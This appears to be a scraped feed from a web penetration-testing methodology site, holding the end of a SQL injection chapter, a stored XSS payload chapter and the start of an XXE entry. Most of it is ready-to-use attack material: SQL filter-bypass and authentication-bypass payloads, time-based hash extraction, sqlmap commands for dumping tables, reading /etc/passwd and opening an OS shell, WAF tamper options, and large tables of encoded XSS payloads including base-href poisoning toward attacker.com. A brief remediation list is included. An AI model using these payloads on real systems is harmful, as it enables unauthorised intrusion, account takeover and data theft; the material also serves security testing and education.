username<span style="color:#f92672">=</span>concat(char(<span style="color:#ae81ff">97</span>),char(<span style="color:#ae81ff">100</span>),char(<span style="color:#ae81ff">109</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Dynamic query: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;; EXEC(&#39;</span>SEL<span style="color:#e6db74">&#39;+&#39;</span>ECT <span style="color:#f92672">*</span> <span style="color:#66d9ef">FROM</span> users<span style="color:#e6db74">&#39;)-- -- MSSQL string concat </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Bypass with LIKE/wildcard: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">WHERE username LIKE 0x61646d696e </span></span></span></code></pre></div><h4 id="filter-bypass-for-specific-keywords">Filter Bypass for Specific Keywords</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- &#34;UNION&#34; blocked: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">UNiOn</span>, <span style="color:#66d9ef">UnIoN</span>, <span style="color:#66d9ef">UNION</span><span style="color:#75715e">/**/</span>, <span style="color:#75715e">/*!UNION*/</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- &#34;SELECT&#34; blocked: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELect</span>, <span style="color:#66d9ef">sElEcT</span>, SEL<span style="color:#75715e">/**/</span>ECT, <span style="color:#75715e">/*!SELECT*/</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- &#34;WHERE&#34; blocked: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHere</span>, <span style="color:#66d9ef">wHeRe</span>, <span style="color:#75715e">/*!WHERE*/</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- &#34;AND/OR&#34; blocked: </span></span></span><span style="display:flex;"><span><span style="color:#f92672">&amp;&amp;</span>, <span style="color:#f92672">||</span>, <span style="color:#f92672">%</span><span style="color:#ae81ff">26</span><span style="color:#f92672">%</span><span style="color:#ae81ff">26</span>, <span style="color:#f92672">%</span><span style="color:#ae81ff">7</span><span style="color:#66d9ef">c</span><span style="color:#f92672">%</span><span style="color:#ae81ff">7</span><span style="color:#66d9ef">c</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- &#34;=&#34; blocked: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">LIKE</span>, REGEXP, <span style="color:#66d9ef">BETWEEN</span> <span style="color:#e6db74">&#39;a&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#e6db74">&#39;b&#39;</span>, <span style="color:#66d9ef">IN</span>(<span style="color:#e6db74">&#39;admin&#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span> username <span style="color:#66d9ef">BETWEEN</span> <span style="color:#e6db74">&#39;admin&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#e6db74">&#39;admin&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Comparison operators: </span></span></span><span style="display:flex;"><span><span style="color:#f92672">&gt;</span> (greater <span style="color:#66d9ef">than</span>) </span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;</span> (<span style="color:#66d9ef">less</span> <span style="color:#66d9ef">than</span>) </span></span><span style="display:flex;"><span><span style="color:#f92672">!=</span> (<span style="color:#66d9ef">not</span> equal) </span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;&gt;</span> (<span style="color:#66d9ef">not</span> equal) </span></span></code></pre></div><h4 id="second-order-injection">Second-Order Injection</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Step 1: Register with payload as username: </span></span></span><span style="display:flex;"><span>Username: <span style="color:#66d9ef">admin</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Step 2: Application stores raw input in DB </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Step 3: Password change query uses stored username: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">UPDATE users SET password=&#39;</span>newpass<span style="color:#e6db74">&#39; WHERE username=&#39;</span><span style="color:#66d9ef">admin</span><span style="color:#e6db74">&#39;--&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Effect: password of &#39;admin&#39; changed, not the attacker&#39;s account </span></span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">-- Common second-order sinks: </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Profile update </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Password reset </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Email preferences </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Log viewers (stored → viewed by admin → executed) </span></span></span></code></pre></div><hr> <h3 id="section-10--database-fingerprinting">Section 10 — Database Fingerprinting</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- MySQL: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#f92672">@@</span><span style="color:#66d9ef">version</span> <span style="color:#75715e">-- 8.0.x </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">version</span>() </span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#f92672">@@</span>datadir </span></span><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#f92672">@@</span>basedir </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; → error mentions &#34;MySQL&#34; or &#34;MariaDB&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- PostgreSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT version() -- PostgreSQL 14.x </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT current_setting(&#39;</span>server_version<span style="color:#e6db74">&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT pg_sleep(0) -- function exists </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT @@version -- Microsoft SQL Server 2019 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT @@servername </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT getdate() </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">WAITFOR DELAY &#39;</span><span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">0</span><span style="color:#e6db74">&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Oracle: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT banner FROM v$version </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT * FROM v$instance </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT user FROM dual </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">dual table exists </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- SQLite: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT sqlite_version() </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SELECT typeof(1) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Differentiate MySQL vs MSSQL: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MySQL: SELECT 1+1 → 2 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL: SELECT 1+1 → 2 (same, use other methods) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MySQL: # comment works </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- MSSQL: # does NOT work, use -- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Universal detection order: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#960050;background-color:#1e0010">→</span> <span style="color:#66d9ef">if</span> error: note DB <span style="color:#66d9ef">type</span> <span style="color:#66d9ef">from</span> error message </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; AND SLEEP(5)-- → MySQL </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> pg_sleep(<span style="color:#ae81ff">5</span>)<span style="color:#75715e">-- → PostgreSQL </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; WAITFOR DELAY &#39;</span><span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">5</span><span style="color:#e6db74">&#39;-- → MSSQL </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">AND</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span>dbms_pipe.receive_message(<span style="color:#e6db74">&#39;a&#39;</span>,<span style="color:#ae81ff">5</span>)<span style="color:#75715e">-- → Oracle </span></span></span></code></pre></div><hr> <h3 id="section-11--authentication-bypass">Section 11 — Authentication Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#75715e">-- Classic: </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">admin</span><span style="color:#e6db74">&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">admin&#39;</span> <span style="color:#f92672">#</span> </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; OR 1=1-- </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">OR</span> <span style="color:#e6db74">&#39;1&#39;</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;1 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;</span> <span style="color:#66d9ef">OR</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">=</span><span style="color:#ae81ff">1</span><span style="color:#f92672">#</span> </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39; OR 1=1/* </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-- Username field: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">admin&#39;</span><span style="color:#75715e">/* </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39;) OR (&#39;1&#39;=&#39;1 </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39;) OR (&#39;1&#39;=&#39;1&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#75715e"> </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- With password field both: </span></span></span><span style="display:flex;"><span><span style="color:#75715e">Username: admin&#39;-- </span></span></span><span style="display:flex;"><span><span style="color:#75715e">Password: anything </span></span></span><span style="display:flex;"><span><span style="color:#75715e"> </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Bypass with AND/OR logic: </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39; OR 1=1 LIMIT 1-- </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39; OR 1=1 ORDER BY 1-- </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39;) OR (1=1)-- </span></span></span><span style="display:flex;"><span><span style="color:#75715e">1&#39; OR &#39;1&#39;=&#39;1 </span></span></span><span style="display:flex;"><span><span style="color:#75715e"> </span></span></span><span style="display:flex;"><span><span style="color:#75715e">-- Time-based auth bypass (extract admin hash): </span></span></span><span style="display:flex;"><span><span style="color:#75715e">&#39; AND IF(SUBSTR((SELECT password FROM users WHERE username=&#39;admin&#39;),1,1)=&#39;a&#39;,SLEEP(5),0)-- </span></span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># SQLMap — automated detection and exploitation:</span> </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --dbs </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> -D dbname --tables </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> -D dbname -T users --dump </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --os-shell </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --file-read<span style="color:#f92672">=</span>/etc/passwd </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --level<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span> --risk<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --technique<span style="color:#f92672">=</span>BEU --dbms<span style="color:#f92672">=</span>mysql </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/items?id=1&#34;</span> --tamper<span style="color:#f92672">=</span>space2comment,randomcase </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SQLMap with POST:</span> </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/login&#34;</span> --data<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;username=admin&amp;password=pass&#34;</span> -p username </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SQLMap from Burp request file:</span> </span></span><span style="display:flex;"><span>sqlmap -r request.txt --level<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span> --risk<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SQLMap cookies:</span> </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/&#34;</span> --cookie<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;session=abc; id=1&#34;</span> -p id </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SQLMap headers:</span> </span></span><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://target.com/&#34;</span> --headers<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;User-Agent: *&#34;</span> --level<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Tamper scripts (WAF bypass):</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>apostrophemask <span style="color:#75715e"># &#39; → %EF%BC%87</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>base64encode <span style="color:#75715e"># encodes payload</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>between <span style="color:#75715e"># &gt; → BETWEEN</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>bluecoat <span style="color:#75715e"># space → %09</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>charencode <span style="color:#75715e"># URL encodes each char</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>charunicodeencode <span style="color:#75715e"># Unicode encodes</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>equaltolike <span style="color:#75715e"># = → LIKE</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>greatest <span style="color:#75715e"># &gt; → GREATEST</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>halfversionedmorekeywords <span style="color:#75715e"># MySQL &lt; 5.1 bypass</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>htmlencode <span style="color:#75715e"># HTML entities</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>ifnull2ifisnull <span style="color:#75715e"># IFNULL → IF(ISNULL)</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>modsecurityversioned <span style="color:#75715e"># versioned comments</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>multiplespaces <span style="color:#75715e"># multiple spaces</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>nonrecursivereplacement <span style="color:#75715e"># double keywords</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>percentage <span style="color:#75715e"># %S%E%L%E%C%T</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>randomcase <span style="color:#75715e"># random case</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2comment <span style="color:#75715e"># space → /**/</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2dash <span style="color:#75715e"># space → --\n</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2hash <span style="color:#75715e"># space → #\n (MySQL)</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2morehash <span style="color:#75715e"># space → #hash\n</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2mssqlblank <span style="color:#75715e"># space → MS-specific blank</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2mysqlblank <span style="color:#75715e"># space → MySQL blank</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>space2plus <span style="color:#75715e"># space → +</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>sp_password <span style="color:#75715e"># appends sp_password (log hiding MSSQL)</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>unmagicquotes <span style="color:#75715e"># \&#39; → %bf%27</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>versionedkeywords <span style="color:#75715e"># keywords → /*!keyword*/</span> </span></span><span style="display:flex;"><span>--tamper<span style="color:#f92672">=</span>versionedmorekeywords <span style="color:#75715e"># more keywords versioned</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Parameterized queries / Prepared statements</strong>: the only reliable fix — never concatenate user input into SQL</li> <li><strong>ORM with safe query builders</strong>: use the ORM&rsquo;s parameterization, never raw string interpolation</li> <li><strong>Input validation</strong>: whitelist permitted characters (digits only for IDs); this is a secondary defense</li> <li><strong>Least privilege</strong>: database account should have only the permissions required — no FILE, no xp_cmdshell</li> <li><strong>WAF</strong>: useful as defense-in-depth but not a substitute for parameterized queries</li> <li><strong>Error handling</strong>: never expose raw SQL errors to users — log internally, return generic message</li> </ul> <hr> <p><em>Part of the Web Application Penetration Testing Methodology series.</em> <em>Previous: <a href="WEB_VULN_INDEX.md">Index</a> | Next: <a href="02_NoSQLi.md">Chapter 02 — NoSQL Injection</a></em></p> Stored XSS: Sanitization Bypass & Encoding Arsenal https://az0th.it/web/input/021-input-xss-stored/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/021-input-xss-stored/ <h1 id="stored-xss-sanitization-bypass--encoding-arsenal">Stored XSS: Sanitization Bypass &amp; Encoding Arsenal</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-79 | <strong>OWASP</strong>: A03:2021 <strong>Reference</strong>: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a></p> </blockquote> <hr> <h2 id="sanitization-stack--read-before-testing">Sanitization Stack — Read Before Testing</h2> <p>Stored XSS payloads must survive <strong>two passes</strong>: sanitization at write time AND output encoding (or lack thereof) at render time. They also traverse the full stack:</p> <pre tabindex="0"><code>[WRITE PATH] Browser form → client-side JS validation → server input filter → DB storage [READ PATH] DB → template engine → browser HTML parser → DOM Bypass strategy per layer: Client JS → intercept in Burp, submit raw Input filter → encoded payload that decodes to XSS after storage DB charset → some DBs strip/alter bytes (test: store emoji, check encoding) Template → look for | safe, | raw, {{{var}}}, dangerouslySetInnerHTML Browser → mXSS: sanitized string re-parsed differently </code></pre><h3 id="identify-output-context-before-picking-payload">Identify Output Context Before Picking Payload</h3> <pre tabindex="0"><code># Submit unique string → visit all pages where it appears → view source # Find exact rendering: &lt;div class=&#34;comment&#34;&gt;YOUR_INPUT&lt;/div&gt; → Context A: HTML body &lt;input value=&#34;YOUR_INPUT&#34;&gt; → Context B: double-quoted attr &lt;a href=&#34;YOUR_INPUT&#34;&gt; → Context C: href &lt;script&gt;var msg = &#34;YOUR_INPUT&#34;;&lt;/script&gt; → Context D: JS string &lt;!-- YOUR_INPUT --&gt; → Context E: HTML comment &lt;script&gt;var cfg = {user: YOUR_INPUT};&lt;/script&gt;→ Context F: JS unquoted </code></pre><hr> <h2 id="payload-table--all-encoding-variants">Payload Table — All Encoding Variants</h2> <h3 id="script-in-html-body-context"><code>&lt;script&gt;</code> in HTML Body Context</h3> <pre tabindex="0"><code>[RAW] &lt;script&gt;alert(1)&lt;/script&gt; &lt;script&gt;alert(document.domain)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; [HTML ENTITY — decimal] &amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62; &amp;#60;script&amp;#62;alert(document.domain)&amp;#60;/script&amp;#62; [HTML ENTITY — hex] &amp;#x3c;script&amp;#x3e;alert(1)&amp;#x3c;/script&amp;#x3e; &amp;#x3c;script&amp;#x3e;alert(document.domain)&amp;#x3c;/script&amp;#x3e; [HTML ENTITY — hex zero-padded (common WAF bypass)] &amp;#x003c;script&amp;#x003e;alert(1)&amp;#x003c;/script&amp;#x003e; &amp;#x003c;script&amp;#x003e;alert(document.domain)&amp;#x003c;/script&amp;#x003e; [HTML ENTITY — no semicolons] &amp;#60script&amp;#62alert(1)&amp;#60/script&amp;#62 &amp;#x3cscript&amp;#x3ealert(document.domain)&amp;#x3c/script&amp;#x3e [URL ENCODED] %3Cscript%3Ealert(1)%3C%2Fscript%3E %3cscript%3ealert(document.domain)%3c%2fscript%3e [DOUBLE URL ENCODED] %253Cscript%253Ealert(1)%253C%252Fscript%253E [UNICODE — for JS context or template injection] \u003cscript\u003ealert(1)\u003c/script\u003e [HTML COMMENT KEYWORD BREAK — fools regex filters] &lt;scr&lt;!----&gt;ipt&gt;alert(1)&lt;/scr&lt;!----&gt;ipt&gt; &lt;scr&lt;!--esi--&gt;ipt&gt;alert(1)&lt;/script&gt; &lt;scr/**/ipt&gt;alert(1)&lt;/script&gt; &lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt; &lt;ScRiPt&gt;alert(document.domain)&lt;/ScRiPt&gt; </code></pre><h3 id="img-onerror--core-stored-xss-payload"><code>&lt;img&gt;</code> onerror — Core Stored XSS Payload</h3> <pre tabindex="0"><code>[RAW] &lt;img src=x onerror=alert(1)&gt; &lt;img src=1 onerror=confirm(1)&gt; &lt;img src=x onerror=alert(document.domain)&gt; &lt;img src=x onerror=alert(document.cookie)&gt; [HTML ENTITY — brackets only] &amp;#x3c;img src=x onerror=alert(1)&amp;#x3e; &amp;#x003c;img src=1 onerror=confirm(1)&amp;#x003e; [HTML ENTITY — event value also encoded (survives htmlspecialchars)] &lt;img src=x onerror=&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&gt; &lt;img src=x onerror=&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&gt; &lt;img src=x onerror=&amp;#x61;l&amp;#x65;rt&amp;#x28;1&amp;#x29;&gt; &lt;img src=x onerror=al&amp;#101;rt(1)&gt; &lt;img src=x onerror=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#49&amp;#41&gt; [HTML ENTITY — full attribute in quotes] &lt;img src=x onerror=&#34;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&#34;&gt; &lt;img src=x onerror=&#34;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&#34;&gt; [URL ENCODED] %3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E %3Cimg%20src%3D1%20onerror%3Dconfirm(1)%3E %3cimg+src%3dx+onerror%3dalert(document.domain)%3e [DOUBLE URL ENCODED] %253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E %253cimg%2520src%253d1%2520onerror%253dconfirm%25281%2529%253e [URL + HTML ENTITY COMBINED] %26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B %26%23x003c%3Bimg%20src%3D1%20onerror%3Dconfirm(1)%26%23x003e%3B%0A [CASE VARIATION + DOUBLE ENCODE — WAF bypass] %253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E [HEX ESCAPE in event] &lt;img src=x onerror=&#34;\x61\x6c\x65\x72\x74(1)&#34;&gt; [UNICODE ESCAPE in event] &lt;img src=x onerror=&#34;\u0061\u006c\u0065\u0072\u0074(1)&#34;&gt; &lt;img src=x onerror=&#34;\u{61}lert(1)&#34;&gt; [BASE64 eval — survives many keyword filters] &lt;img src=x onerror=&#34;eval(atob(&#39;YWxlcnQoMSk=&#39;))&#34;&gt; &lt;img src=x onerror=&#34;eval(atob(&#39;YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==&#39;))&#34;&gt; &lt;img src=x onerror=&#34;eval(atob(&#39;YWxlcnQoZG9jdW1lbnQuY29va2llKQ==&#39;))&#34;&gt; [FROMCHARCODE — no string literals needed] &lt;img src=x onerror=&#34;eval(String.fromCharCode(97,108,101,114,116,40,49,41))&#34;&gt; </code></pre><h3 id="svg-based"><code>&lt;svg&gt;</code> Based</h3> <pre tabindex="0"><code>[RAW] &lt;svg onload=alert(1)&gt; &lt;svg/onload=confirm(1)&gt; &lt;svg onload=alert(document.domain)&gt; [HTML ENTITY] &amp;#x3c;svg onload=alert(1)&amp;#x3e; &amp;#x003c;svg onload=alert(document.domain)&amp;#x003e; &amp;#60;svg onload=alert(1)&amp;#62; [URL ENCODED] %3Csvg%20onload%3Dalert(1)%3E %3csvg%2fonload%3dconfirm(1)%3e [DOUBLE URL ENCODED] %253Csvg%2520onload%253Dalert(1)%253E %253CSvg%2520OnLoAd%253Dconfirm(1)%253E [SVG ANIMATE — alternative to onload] &lt;svg&gt;&lt;animate onbegin=alert(1) attributeName=x dur=1s&gt; &lt;svg&gt;&lt;set onbegin=alert(1) attributeName=x to=1&gt; &lt;svg&gt;&lt;discard onbegin=alert(1)&gt; [SVG SCRIPT element] &lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt; &lt;svg&gt;&lt;script&gt;alert&amp;#40;1&amp;#41;&lt;/script&gt;&lt;/svg&gt; &lt;svg&gt;&lt;script&gt;alert&amp;lpar;1&amp;rpar;&lt;/script&gt;&lt;/svg&gt; </code></pre><h3 id="embed-object-base--often-missed-by-filters"><code>&lt;embed&gt;</code>, <code>&lt;object&gt;</code>, <code>&lt;base&gt;</code> — Often Missed by Filters</h3> <pre tabindex="0"><code>[EMBED] &lt;embed src=javascript:alert(1)&gt; &lt;embed src=&#34;javascript:alert(document.domain)&#34;&gt; &lt;embed src=https://az0th.it/x//alert(1)&gt; [OBJECT] &lt;object data=javascript:alert(1)&gt; &lt;object data=&#34;javascript:alert(document.cookie)&#34;&gt; &amp;#x3c;object data=javascript:alert(1)&amp;#x3e; [BASE HREF POISONING — redirects all relative script loads] &lt;base href=&#34;javascript:\ &lt;base href=&#34;javascript:alert(1)//&#34;&gt; &lt;base href=&#34;//attacker.com/&#34;&gt; [EMBED + BASE COMBINED] &lt;embed src=https://az0th.it/x//alert(1)&gt;&lt;base href=&#34;javascript:\ </code></pre><hr> <h2 id="bypassing-specific-sanitizers">Bypassing Specific Sanitizers</h2> <h3 id="bypassing-strip_tags--php">Bypassing <code>strip_tags()</code> — PHP</h3> <p><code>strip_tags()</code> removes tags but leaves content. Critical: it does NOT protect attribute context.</p> XML External Entity Injection (XXE) https://az0th.it/web/input/011-input-xxe/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/input/011-input-xxe/ <h1 id="xml-external-entity-injection-xxe">XML External Entity Injection (XXE)</h1> <blockquote> <p><strong>Severity</strong>: 